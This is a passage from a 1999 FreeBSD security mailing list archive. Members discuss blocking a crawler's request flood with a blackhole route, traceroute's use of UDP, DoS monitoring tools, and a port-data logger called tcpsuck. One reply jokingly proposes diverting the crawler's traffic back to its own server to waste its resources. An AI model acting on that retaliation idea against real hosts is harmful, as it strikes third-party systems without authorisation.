hole.) memory for awhile. Any way to filter the incoming ones without installing a full-up firewall? --Brett At 08:39 AM 5/24/99 +0200, Poul-Henning Kamp wrote: >In message , Michael Richards >writes: > >On Sun, 23 May 1999, Brett Glass wrote: > > > >> The Webmasters on this list may want to look over their logs to see > >> if they've been hit and not known it. grep your logs for imagelock.com; > >> if you find that they're abusing your server, you may want to firewall > >I noticed we were hit by them this evening. 1250 requests in a few > >minutes. Since we're not running a firewall, is there a recommended method > >of filtering such people out? I think I did it with apache, but I'm > >wondering if there is a better method. > >Add a blackhole route to them: > > route add -net -netmask 127.0.0.1 -blackhole > >-- >Poul-Henning Kamp FreeBSD coreteam member >phk@FreeBSD.ORG "Real hackers run -current on their laptop." >FreeBSD -- It will take a long time before progress goes too far! > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 9:37:28 1999 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 27CC714E41 for ; Mon, 24 May 1999 09:37:25 -0700 (PDT) (envelope-from des@flood.ping.uio.no) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.1) id SAA90838; Mon, 24 May 1999 18:37:19 +0200 (CEST) (envelope-from des) To: Nate Williams Cc: Dag-Erling Smorgrav , "Bert Kellerman" , "Matthew Dillon" , Subject: Re: Denial of service attack from "imagelock.com" References: <4.2.0.37.19990522105949.0465d4a0@localhost> <199905221714.KAA74179@apollo.backplane.com> <009401bea570$09546a80$5f64a8c0@crackhouse.com> <199905241603.KAA11763@mt.sri.com> From: Dag-Erling Smorgrav Date: 24 May 1999 18:37:18 +0200 In-Reply-To: Nate Williams's message of "Mon, 24 May 1999 10:03:17 -0600" Message-ID: Lines: 13 X-Mailer: Gnus v5.5/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Nate Williams writes: > > "Bert Kellerman" writes: > > > You need UDP connectivity to perform a successful traceroute from a UNIX > > > client..not TCP. [...] > > Bullshit. RTFM. > DES, you don't know what you're talking about. A ping doesn't require > UDP, but traceroute certainly coes. No it does not. At least not in -current. DES -- Dag-Erling Smorgrav - des@flood.ping.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 9:44:55 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns.mt.sri.com (sri-gw.MT.net [206.127.105.141]) by hub.freebsd.org (Postfix) with ESMTP id 8B3CB154D4 for ; Mon, 24 May 1999 09:44:51 -0700 (PDT) (envelope-from nate@mt.sri.com) Received: from mt.sri.com (rocky.mt.sri.com [206.127.76.100]) by ns.mt.sri.com (8.8.8/8.8.8) with SMTP id KAA10019; Mon, 24 May 1999 10:44:44 -0600 (MDT) (envelope-from nate@rocky.mt.sri.com) Received: by mt.sri.com (SMI-8.6/SMI-SVR4) id KAA12091; Mon, 24 May 1999 10:44:43 -0600 Date: Mon, 24 May 1999 10:44:43 -0600 Message-Id: <199905241644.KAA12091@mt.sri.com> From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: Dag-Erling Smorgrav Cc: Nate Williams , "Bert Kellerman" , "Matthew Dillon" , Subject: Re: Denial of service attack from "imagelock.com" In-Reply-To: References: <4.2.0.37.19990522105949.0465d4a0@localhost> <199905221714.KAA74179@apollo.backplane.com> <009401bea570$09546a80$5f64a8c0@crackhouse.com> <199905241603.KAA11763@mt.sri.com> X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > > > You need UDP connectivity to perform a successful traceroute from a UNIX > > > > client..not TCP. [...] > > > Bullshit. RTFM. > > DES, you don't know what you're talking about. A ping doesn't require > > UDP, but traceroute certainly coes. > > No it does not. At least not in -current. -current is not used by very many folks (it certainly should not be used by anyone in production environments) and non-UDP traceroute is only used by a few OS's. Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 9:59:48 1999 Delivered-To: freebsd-security@freebsd.org Received: from brooklyn.slack.net (brooklyn.slack.net [206.41.21.102]) by hub.freebsd.org (Postfix) with ESMTP id DED1B14D32 for ; Mon, 24 May 1999 09:59:44 -0700 (PDT) (envelope-from andrewr@brooklyn.slack.net) Received: from localhost (andrewr@localhost) by brooklyn.slack.net (8.8.7/8.8.7) with SMTP id NAA21347; Mon, 24 May 1999 13:04:27 -0400 (EDT) Date: Mon, 24 May 1999 13:04:26 -0400 (EDT) From: andrewr To: Terry Warner Cc: freebsd-security@FreeBSD.ORG Subject: Re: Monitering In-Reply-To: <199905241407.KAA02587@www.netlabs.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Well there is Network Flight Recorder (NFR).. Check that out. www.nfr.net Andrew On Mon, 24 May 1999, Terry Warner wrote: > > Can anyone recommend a good System moniter .. for like detecting DoS attacks and such .. and which can log to files? > > if so please get back to me .. Thank you > > Terry Warner > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 10: 2:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (Postfix) with SMTP id 439F314C35 for ; Mon, 24 May 1999 10:02:20 -0700 (PDT) (envelope-from sthaug@nethelp.no) Received: (qmail 33878 invoked by uid 1001); 24 May 1999 17:02:19 +0000 (GMT) To: nate@mt.sri.com Cc: security@FreeBSD.ORG Subject: Re: Denial of service attack from "imagelock.com" From: sthaug@nethelp.no In-Reply-To: Your message of "Mon, 24 May 1999 10:44:43 -0600" References: <199905241644.KAA12091@mt.sri.com> X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Mon, 24 May 1999 19:02:19 +0200 Message-ID: <33876.927565339@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > -current is not used by very many folks (it certainly should not be used > by anyone in production environments) and non-UDP traceroute is only > used by a few OS's. Checking some more I see that it has actually been MFCed, so the non-UDP version is also in 3.2-STABLE (but not in 3.2-RELEASE). Anybody know of other OSes that have the non-UDP version? (Excluding Windows, of course, which has been based on ICMP all the time, AFAIK). Steinar Haug, Nethelp consulting, sthaug@nethelp.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 10:37:22 1999 Delivered-To: freebsd-security@freebsd.org Received: from guepardo.vicosa.com.br (guepardo.tdnet.com.br [200.236.148.6]) by hub.freebsd.org (Postfix) with ESMTP id 08C3314EB3 for ; Mon, 24 May 1999 10:37:05 -0700 (PDT) (envelope-from kernel@tdnet.com.br) Received: from tdnet.com.br [200.236.148.196] by guepardo.vicosa.com.br with ESMTP (SMTPD32-5.00) id A0A1C201F2; Mon, 24 May 1999 14:47:13 -0300 Message-ID: <374963F1.40801C41@tdnet.com.br> Date: Mon, 24 May 1999 14:36:33 +0000 From: Unknow User X-Mailer: Mozilla 4.05 [en] (X11; I; FreeBSD 2.2.8-STABLE i386) MIME-Version: 1.0 To: Kris Kennaway Cc: freebsd-security@freebsd.org Subject: Re: user uses xv3.10a (PNG) to halt my system. References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kris Kennaway wrote: > This question was already answered on freebsd-hackers. Why are you asking > again here? 1) I don't sign up to 100 of mailing lists! 2) If i did, i did not know this questions is already answered! 3) I i am sorry if i did a mistaken! -- "The box said 'Requires Windows 98, NT, Linux or better' so I installed FreeBSD." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 11:18: 6 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 3789014D00 for ; Mon, 24 May 1999 11:18:01 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id MAA80501; Mon, 24 May 1999 12:16:40 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id MAA20443; Mon, 24 May 1999 12:17:08 -0600 (MDT) Message-Id: <199905241817.MAA20443@harmony.village.org> To: ark@eltex.ru Subject: Re: Server trying to connect to Port 113 Cc: freebsd-security@FreeBSD.ORG, des@flood.ping.uio.no In-reply-to: Your message of "Mon, 24 May 1999 18:44:07 +0400." <199905241444.SAA23381@paranoid.eltex.spb.ru> References: <199905241444.SAA23381@paranoid.eltex.spb.ru> Date: Mon, 24 May 1999 12:17:08 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <199905241444.SAA23381@paranoid.eltex.spb.ru> ark@eltex.ru writes: : Netbios session service, yes. Netbios datagram/name service, no. We have 204.144.255.x and constantly get traffic from cretins who think that the proper netmask for the 204 net is 255.255.0.0. We get it every time a new NT/Win box is placed online at one of the clients of our ISP. :-( Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 11:33: 7 1999 Delivered-To: freebsd-security@freebsd.org Received: from wopr.caltech.edu (wopr.caltech.edu [131.215.240.222]) by hub.freebsd.org (Postfix) with ESMTP id E974514D7F for ; Mon, 24 May 1999 11:33:00 -0700 (PDT) (envelope-from mph@wopr.caltech.edu) Received: (from mph@localhost) by wopr.caltech.edu (8.9.3/8.9.1) id LAA14100; Mon, 24 May 1999 11:32:23 -0700 (PDT) (envelope-from mph) Date: Mon, 24 May 1999 11:32:23 -0700 From: Matthew Hunt To: Unknow User Cc: Kris Kennaway , freebsd-security@FreeBSD.ORG Subject: Re: user uses xv3.10a (PNG) to halt my system. Message-ID: <19990524113222.B13871@wopr.caltech.edu> References: <374963F1.40801C41@tdnet.com.br> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <374963F1.40801C41@tdnet.com.br>; from Unknow User on Mon, May 24, 1999 at 02:36:33PM +0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, May 24, 1999 at 02:36:33PM +0000, Unknow User wrote: > 1) I don't sign up to 100 of mailing lists! > 2) If i did, i did not know this questions is already answered! > 3) I i am sorry if i did a mistaken! Before posting a question, you should search the mailing list archives at www.freebsd.org to see if it has already been addressed. That way, you don't need to subscribe to a lot of lists, but you can still check to see whether your problem has already been solved. Matt -- Matthew Hunt * Stay close to the Vorlon. http://www.pobox.com/~mph/ * To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 11:34:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (Postfix) with ESMTP id 5885815122 for ; Mon, 24 May 1999 11:34:26 -0700 (PDT) (envelope-from jkb@shell6.ba.best.com) Received: (from jkb@localhost) by shell6.ba.best.com (8.9.3/8.9.2/best.sh) id LAA03178; Mon, 24 May 1999 11:33:07 -0700 (PDT) Message-ID: <19990524113306.A29468@best.com> Date: Mon, 24 May 1999 11:33:06 -0700 From: "Jan B. Koum " To: sthaug@nethelp.no, nate@mt.sri.com Cc: security@FreeBSD.ORG Subject: Re: Denial of service attack from "imagelock.com" References: <199905241644.KAA12091@mt.sri.com> <33876.927565339@verdi.nethelp.no> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <33876.927565339@verdi.nethelp.no>; from sthaug@nethelp.no on Mon, May 24, 1999 at 07:02:19PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, May 24, 1999 at 07:02:19PM +0200, sthaug@nethelp.no wrote: > > -current is not used by very many folks (it certainly should not be used > > by anyone in production environments) and non-UDP traceroute is only > > used by a few OS's. > > Checking some more I see that it has actually been MFCed, so the non-UDP > version is also in 3.2-STABLE (but not in 3.2-RELEASE). > > Anybody know of other OSes that have the non-UDP version? (Excluding > Windows, of course, which has been based on ICMP all the time, AFAIK). > > Steinar Haug, Nethelp consulting, sthaug@nethelp.no > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message Actually 3.2-STABLE uses UDP version by default. Look: foo% traceroute nau traceroute to nautilus.yahoo.com (206.132.89.24), 30 hops max, 40 byte packets 1 nautilus (206.132.89.24) 0.332 ms 0.283 ms 0.234 ms nautilus% !! and not port 22 tcpdump host foo and not port 22 tcpdump: listening on fxp0 11:30:03.082728 foo.yahoo.com.34556 > nautilus.yahoo.com.33435: udp 12 [ttl 1] 11:30:03.082817 nautilus.yahoo.com > foo.yahoo.com: icmp: nautilus.yahoo.com udp port 33435 unreachable 11:30:03.085415 foo.yahoo.com.34556 > nautilus.yahoo.com.33436: udp 12 [ttl 1] 11:30:03.085488 nautilus.yahoo.com > foo.yahoo.com: icmp: nautilus.yahoo.com udp port 33436 unreachable 11:30:03.085824 foo.yahoo.com.34556 > nautilus.yahoo.com.33437: udp 12 [ttl 1] 11:30:03.085877 nautilus.yahoo.com > foo.yahoo.com: icmp: nautilus.yahoo.com udp port 33437 unreachable BTW, would be nice to put traceroute 1.4 into /usr/src/contrib .. it ihas support for icmp only traceroute (-I) which is IMHO cool. ;) -- Yan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 12:30:10 1999 Delivered-To: freebsd-security@freebsd.org Received: from andyo.prime.net (P1M2.prime.net.ua [195.64.229.34]) by hub.freebsd.org (Postfix) with ESMTP id 17B3615200 for ; Mon, 24 May 1999 12:29:10 -0700 (PDT) (envelope-from andyo@prime.net.ua) Received: from prime.net.ua (localhost [127.0.0.1]) by andyo.prime.net (8.9.3/8.9.3) with ESMTP id WAA00522; Mon, 24 May 1999 22:29:01 +0300 (EET DST) Message-ID: <3749A86D.59F4FDB0@prime.net.ua> Date: Mon, 24 May 1999 22:28:45 +0300 From: =?koi8-r?Q?=E1=CE=C4=D2=C5=CA=20=F7=2E=20=EF=CC=C5=CA=CE=C9=CB?= (Andy V. Oleynik) Reply-To: andyo@prime.net.ua Organization: =?koi8-r?Q?=ED=2D=E9=CE=C6=CF?= X-Mailer: Mozilla 4.5 [en] (X11; I; FreeBSD 2.2.5-RELEASE i386) X-Accept-Language: ru, uk, en MIME-Version: 1.0 To: Terry Warner Cc: freebsd-security@FreeBSD.ORG Subject: Re: Monitering References: <199905241407.KAA02587@www.netlabs.net> Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Trafshow IMHO is simplest & the best against DoS. Terry Warner wrote: > Can anyone recommend a good System moniter .. for like detecting DoS attacks and such .. and which can log to files? > > if so please get back to me .. Thank you > > Terry Warner > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Andy V. Oleynik (When U aim for perfection, U discover it's a moving target Ã80) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 13: 4:38 1999 Delivered-To: freebsd-security@freebsd.org Received: from quaggy.ursine.com (lambda.blueneptune.com [209.133.45.179]) by hub.freebsd.org (Postfix) with ESMTP id 338F414E98 for ; Mon, 24 May 1999 13:04:35 -0700 (PDT) (envelope-from fbsd-security@ursine.com) Received: from michael (lambda.ursine.com [209.133.45.69]) by quaggy.ursine.com (8.9.2/8.9.2) with ESMTP id NAA31537; Mon, 24 May 1999 13:04:11 -0700 (PDT) (envelope-from fbsd-security@ursine.com) Message-ID: <199905241304140770.135F6CF4@quaggy.ursine.com> In-Reply-To: <4.2.0.37.19990524092545.0474cd50@localhost> References: <199905231424140440.0E81E3D5@quaggy.ursine.com> <4.2.0.37.19990523191423.04639500@localhost> <4.2.0.37.19990524092545.0474cd50@localhost> X-Mailer: Calypso Version 3.00.00.13 (2) Date: Mon, 24 May 1999 13:04:14 -0700 From: "Michael Bryan" To: "Brett Glass" , "Joao Assad" , freebsd-security@FreeBSD.ORG Subject: Re: Denial of service attack from "imagelock.com" Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >So much for the 3-10 minutes they claim! I thought they claimed 3 seconds to 10 minutes? Michael Bryan fbsd-security@ursine.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 19:13:32 1999 Delivered-To: freebsd-security@freebsd.org Received: from henry.cs.adfa.edu.au (henry.cs.adfa.edu.au [131.236.21.158]) by hub.freebsd.org (Postfix) with ESMTP id 3CE8A154C6 for ; Mon, 24 May 1999 19:13:26 -0700 (PDT) (envelope-from wkt@henry.cs.adfa.edu.au) Received: (from wkt@localhost) by henry.cs.adfa.edu.au (8.9.2/8.9.1) id MAA02815 for freebsd-security@FreeBSD.ORG; Tue, 25 May 1999 12:13:26 +1000 (EST) (envelope-from wkt) From: Warren Toomey Message-Id: <199905250213.MAA02815@henry.cs.adfa.edu.au> Subject: TCP connect data logger To: freebsd-security@FreeBSD.ORG Date: Tue, 25 May 1999 12:13:26 +1000 (EST) Reply-To: wkt@cs.adfa.edu.au X-Mailer: ELM [version 2.4ME+ PL43 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is strictly off-topic for FreeBSD, but anyway ... A few people desired to know why someone was attacking port X on their box. Ages ago, I wrote a small program, tcpsuck, that is run from inetd. Tcpsuck sits on a port and logs the data coming in. It stops after a pre-defined timeout, or when the remote end break the connection. This can help you to determine what they are looking for. It also slows TCP port strobe attacks, too :-) Here is where I use it on my system: bootserver stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck cisco-tna stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck exec stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck cmd stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck nicname stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck pop2 stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck pop3 stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck imap2 stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck supdup stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck systat stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck tcpmux stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck login stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck shell stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck I also wrote a udpsuck program for UDP ports, but current FreeBSD versions have UDP packet logging built-in. Anybody interested in tcpsuck? Warren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 21:11:19 1999 Delivered-To: freebsd-security@freebsd.org Received: from henry.cs.adfa.edu.au (henry.cs.adfa.edu.au [131.236.21.158]) by hub.freebsd.org (Postfix) with ESMTP id 2F33E15063 for ; Mon, 24 May 1999 21:11:14 -0700 (PDT) (envelope-from wkt@henry.cs.adfa.edu.au) Received: (from wkt@localhost) by henry.cs.adfa.edu.au (8.9.2/8.9.1) id OAA03063 for security@freebsd.org; Tue, 25 May 1999 14:11:08 +1000 (EST) (envelope-from wkt) From: Warren Toomey Message-Id: <199905250411.OAA03063@henry.cs.adfa.edu.au> Subject: Location of TCP/UDP packet suckers To: security@freebsd.org Date: Tue, 25 May 1999 14:11:08 +1000 (EST) Reply-To: wkt@cs.adfa.edu.au X-Mailer: ELM [version 2.4ME+ PL43 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Well, I got a large response back from my offer of a TCP connection logger. Yes, I should have just offered the URL straightaway! You can get the source at: ftp://minnie.cs.adfa.edu.au/pub/NetSecurity/pktsuckers.tar.gz They were last modified January 1996. I could think of some extra functionality, e.g to ignore broadcast UDP packets, or packets from the local subnet, but I haven't bothered. Hope you find them useful. They compile under FreeBSD 3.x, and should be easily ported to most other Unix flavours. Cheers, Warren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 21:14:21 1999 Delivered-To: freebsd-security@freebsd.org Received: from henry.cs.adfa.edu.au (henry.cs.adfa.edu.au [131.236.21.158]) by hub.freebsd.org (Postfix) with ESMTP id 2ED5015063 for ; Mon, 24 May 1999 21:14:17 -0700 (PDT) (envelope-from wkt@henry.cs.adfa.edu.au) Received: (from wkt@localhost) by henry.cs.adfa.edu.au (8.9.2/8.9.1) id OAA03109; Tue, 25 May 1999 14:14:06 +1000 (EST) (envelope-from wkt) From: Warren Toomey Message-Id: <199905250414.OAA03109@henry.cs.adfa.edu.au> Subject: Re: TCP connect data logger In-Reply-To: <19990525000758.A14670@fw.garman.net> from Jason Garman at "May 25, 1999 0: 7:58 am" To: garman@earthling.net Date: Tue, 25 May 1999 14:14:06 +1000 (EST) Cc: security@freebsd.org Reply-To: wkt@cs.adfa.edu.au X-Mailer: ELM [version 2.4ME+ PL43 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In article by Jason Garman: > also, how does one enable the UDP packet logging in recent FreeBSD's? The sysctl net.inet.udp.log_in_vain option seems to be the one. Maybe it doesn't log the contents, just some of the headers. I haven't used it yet. Warren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 21:20:10 1999 Delivered-To: freebsd-security@freebsd.org Received: from pop03.globecomm.net (pop03.globecomm.net [206.253.130.65]) by hub.freebsd.org (Postfix) with ESMTP id 4FDD515063 for ; Mon, 24 May 1999 21:20:01 -0700 (PDT) (envelope-from jschwab@royal.net) Received: from usr15-dialup51.mix1.Irving.cw.net (usr15-dialup51.mix1.Irving.cw.net [166.62.215.51]) by pop03.globecomm.net (8.9.0/8.8.0) with ESMTP id AAA04176; Tue, 25 May 1999 00:19:44 -0400 (EDT) Date: Mon, 24 May 1999 22:17:03 -0600 (MDT) From: "Jason L. Schwab" X-Sender: jschwab@shellsys.net To: wkt@cs.adfa.edu.au Cc: freebsd-security@FreeBSD.ORG Subject: Re: TCP connect data logger In-Reply-To: <199905250213.MAA02815@henry.cs.adfa.edu.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Yes, I'm interested in it! Sounds like something I could use! - ------------------------------------- Jason L. Schwab * Unix System Administrator * ------------------------------------- On Tue, 25 May 1999, Warren Toomey wrote: > This is strictly off-topic for FreeBSD, but anyway ... A few people desired > to know why someone was attacking port X on their box. Ages ago, I wrote a > small program, tcpsuck, that is run from inetd. Tcpsuck sits on a port and > logs the data coming in. It stops after a pre-defined timeout, or when the > remote end break the connection. > > This can help you to determine what they are looking for. It also slows > TCP port strobe attacks, too :-) > > Here is where I use it on my system: > > bootserver stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck > cisco-tna stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck > exec stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck > cmd stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck > nicname stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck > pop2 stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck > pop3 stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck > imap2 stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck > supdup stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck > systat stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck > tcpmux stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck > login stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck > shell stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck > > I also wrote a udpsuck program for UDP ports, but current FreeBSD versions > have UDP packet logging built-in. > > Anybody interested in tcpsuck? > > Warren > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 21:30:23 1999 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.aac.dev.com (unknown [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id 0395F14E91 for ; Mon, 24 May 1999 21:30:15 -0700 (PDT) (envelope-from rgrimes@gndrsh.aac.dev.com) Received: (from rgrimes@localhost) by gndrsh.aac.dev.com (8.9.3/8.9.3) id VAA08832; Mon, 24 May 1999 21:24:16 -0700 (PDT) (envelope-from rgrimes) From: "Rodney W. Grimes" Message-Id: <199905250424.VAA08832@gndrsh.aac.dev.com> Subject: Re: Denial of service attack from "imagelock.com" In-Reply-To: <4.2.0.37.19990524100208.04727460@localhost> from Brett Glass at "May 24, 1999 10:03:38 am" To: brett@lariat.org (Brett Glass) Date: Mon, 24 May 1999 21:24:16 -0700 (PDT) Cc: phk@critter.freebsd.dk (Poul-Henning Kamp), 026809r@dragon.acadiau.ca (Michael Richards), freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I like this idea. BUT.... You'll still get their SYNs and use up kernel > memory. (Only the OUTBOUND packets will disappear into a black hole.) > memory for awhile. Any way to filter the incoming ones without installing > a full-up firewall? Yea, but they aren't going to crawl very far around your website when it looks like your not responding. Also it should consume thier resources at least a little bit, and I LIKE THAT IDEA!!! Hummm... lets see.. how can I consume more of thier resources and less of mine.... ahhh. got it... ipdivert 209.133.111.0/24 www.imagelock.com. Yea, that outa confuse the snot out of them....... and if they change IP's it'll still get em :-) > --Brett > > At 08:39 AM 5/24/99 +0200, Poul-Henning Kamp wrote: > >In message , Michael Richards > >writes: > > >On Sun, 23 May 1999, Brett Glass wrote: > > > > > >> The Webmasters on this list may want to look over their logs to see > > >> if they've been hit and not known it. grep your logs for imagelock.com; > > >> if you find that they're abusing your server, you may want to firewall > > >I noticed we were hit by them this evening. 1250 requests in a few > > >minutes. Since we're not running a firewall, is there a recommended method > > >of filtering such people out? I think I did it with apache, but I'm > > >wondering if there is a better method. > > > >Add a blackhole route to them: > > > > route add -net -netmask 127.0.0.1 -blackhole > > > >-- > >Poul-Henning Kamp FreeBSD coreteam member > >phk@FreeBSD.ORG "Real hackers run -current on their laptop." > >FreeBSD -- It will take a long time before progress goes too far! > > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > >with "unsubscribe freebsd-security" in the body of the message > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.aac.dev.com Accurate Automation, Inc. Reliable computers for FreeBSD http://www.aai.dnsmgr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 22:20:57 1999 Delivered-To: freebsd-security@freebsd.org Received: from wedgie.org (pm510-09.dialip.mich.net [131.118.249.231]) by hub.freebsd.org (Postfix) with ESMTP id 5D64314DF1 for ; Mon, 24 May 1999 22:20:40 -0700 (PDT) (envelope-from jgarman@wedgie.org) Received: by wedgie.org (Postfix, from userid 1000) id 7E2661FF01; Tue, 25 May 1999 01:20:33 -0400 (EDT) Date: Tue, 25 May 1999 01:20:33 -0400 From: Jason Garman To: wkt@cs.adfa.edu.au Cc: security@FreeBSD.ORG Subject: Re: TCP connect data logger Message-ID: <19990525012032.A25197@fw.garman.net> Reply-To: garman@earthling.net References: <19990525000758.A14670@fw.garman.net> <199905250414.OAA03109@henry.cs.adfa.edu.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <199905250414.OAA03109@henry.cs.adfa.edu.au>; from Warren Toomey on Tue, May 25, 1999 at 02:14:06PM +1000 X-Phase-Of-Moon: The Moon is Waxing Gibbous (78% of Full) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: 